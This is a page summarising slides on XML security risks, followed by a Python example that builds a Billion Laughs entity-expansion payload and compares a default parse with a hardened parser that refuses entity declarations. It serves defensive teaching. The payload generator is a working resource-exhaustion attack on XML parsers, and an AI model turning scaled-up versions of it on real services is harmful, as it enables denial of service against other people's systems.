XML Risks and Mitigations
The material in these slides covers many of the basic security considerations of XML. People who design XML documents and applications should know and understand these considerations. The material explains the various aspects of XML security. It presents basic information about XML and discusses how these fundamental properties of the format influence XML security. It describes a range of XML security issues, including several that are sometimes overlooked. The objective is to help the reader become better informed about which security concepts apply to a given use case and to obtain recommendations for implementing those concepts.

The slides do not repeat step-by-step instructions that are provided elsewhere. For example, the slides might recommend that an XML document be digitally signed to provide authentication or integrity protection, but they do not explain in detail how to digitally sign an XML document. Rather, the reader is referred to the XML Digital Signature specification.

The slides discuss the risks and mitigations of:

- Using Unicode in XML documents
- Unused namespaces
- Namespace prefixes
- Hidden markup
- Exponentially expanding entities (for example, the Billion Laughs attack)
- Exponential regular expressions (catastrophic backtracking)
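The Billion Laughs attack named in the list above, as an added example that is not part of the MITRE slides: a constructed payload whose few hundred bytes of DTD expand to thousands of characters, a parse with Python's default ElementTree settings that pays for that expansion, and a parse through the expat API directly that refuses any entity declaration. Every name here (`billion_laughs`, `naive_parse`, `hardened_parse`, `EntityDeclarationError`) is this example's own; the rejection approach mirrors what packages such as defusedxml do and is not a recommendation taken from the slides.

```python
"""Billion Laughs: a tiny DTD that expands exponentially, a naive parser
that expands it, and a hardened parser that refuses it.

Added example for this page, not code from the MITRE slides. It uses only
the Python standard library. The payload generator and parser helpers are
this example's own names; the "refuse every entity declaration" mitigation
is one common approach (the same idea defusedxml implements), not a
mitigation quoted from the slides.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class EntityDeclarationError(ValueError):
    """Raised when a document tries to declare an entity (internal or external)."""


def billion_laughs(depth: int = 3, fanout: int = 10, base: str = "lol") -> str:
    """Build a constructed Billion Laughs payload using internal entities.

    lol0 is the base string; every lolN references lol(N-1) `fanout` times.
    The DTD is only O(depth * fanout) bytes, but referencing &lolN; expands
    to len(base) * fanout**depth characters. Defaults are small so the naive
    parse finishes instantly; the classic attack uses depth 9 and fanout 10,
    about a billion copies of "lol".
    """
    decls = [f'<!ENTITY lol0 "{base}">']
    for i in range(1, depth + 1):
        refs = f"&lol{i - 1};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    dtd = "\n".join(decls)
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE lolz [\n{dtd}\n]>\n"
        f"<lolz>&lol{depth};</lolz>"
    )


def expansion_size(depth: int, fanout: int, base_len: int = 3) -> int:
    """Characters produced by expanding the top entity of billion_laughs()."""
    return base_len * fanout ** depth


def naive_parse(xml_text: str) -> str:
    """Parse with default ElementTree settings and return the root's text.

    Expat expands internal entities before the tree builder sees the data,
    so the caller pays for the full expansion in memory and CPU.
    """
    return ET.fromstring(xml_text).text or ""


def hardened_parse(xml_text: str) -> str:
    """Parse with expat directly, refusing any entity declaration.

    Rejecting declarations in the DTD stops both the exponential expansion
    (internal entities) and SYSTEM/external entity retrieval, because both
    are declared the same way. Returns the document's character data.
    """
    parser = expat.ParserCreate()
    chunks = []

    def forbid_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # An exception raised inside an expat handler stops parsing and
        # propagates out of parser.Parse().
        raise EntityDeclarationError(f"entity declaration refused: {name!r}")

    parser.EntityDeclHandler = forbid_entity
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)


def rejects_entities(xml_text: str) -> bool:
    """True if hardened_parse() refuses the document because it declares entities."""
    try:
        hardened_parse(xml_text)
    except EntityDeclarationError:
        return True
    return False


if __name__ == "__main__":
    payload = billion_laughs()
    print(f"payload size: {len(payload)} bytes")
    print(f"expanded size: {len(naive_parse(payload))} characters "
          f"(predicted {expansion_size(3, 10)})")
    print(f"hardened parser rejects payload: {rejects_entities(payload)}")
```

Raise `depth` toward 9 only on a machine you are willing to exhaust. Recent libexpat builds (2.4 and later) also enforce an amplification limit once the expanded output passes a size threshold, which is why the small defaults above pass through a naive parse untouched; that limit addresses resource exhaustion only and says nothing about external entity retrieval, so refusing entity declarations outright, as `hardened_parse` does, remains the simpler policy for documents that have no legitimate need for a DTD.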